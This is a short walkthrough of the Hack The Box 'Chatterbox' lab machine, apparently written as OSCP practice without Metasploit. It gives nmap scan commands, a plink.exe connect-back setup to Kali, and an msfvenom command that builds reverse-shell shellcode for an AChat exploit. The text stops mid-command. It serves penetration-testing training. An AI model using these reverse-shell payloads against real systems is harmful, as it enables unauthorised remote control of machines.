HTB Chatterbox OSCP No Metasploit
Lessons Learned nmap -sT -p- --min-rate 5000 --max-retries 1 10.10.10.74 -Pn (Use this if aggressive scan is slow) Password must be set on root for plink.exe to connect back to Kali (sudo su; passwd root) Must use root account for Ports 1024 and under to connect. Walkthrough First I scan using nmap. My usual nmap -A -p- 10.10.10.74 was on schedule for 3 hours and 30 minutes! I found this nmap option which IS BEAUTIFUL , AMAZING , and a TIME SAVER . If a box takes too long to scan, I will def turn to this. It will become a staple. nmap -sT -p- --min-rate 5000 --max-retries 1 10.10.10.74 -Pn I then do an aggressive scan on both of the ports. AChat is in the header. I searchsploit it. Use msfvenom to generate python shellcode. Remember to include LHOST and LPORT. I changed the -p payload to windows/shell_reverse_tcp msfvenom LHOST=10.10.14.2 LPORT=4444 -a x86 --platform Windows -p windows/shell_reverse_tcp -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x8...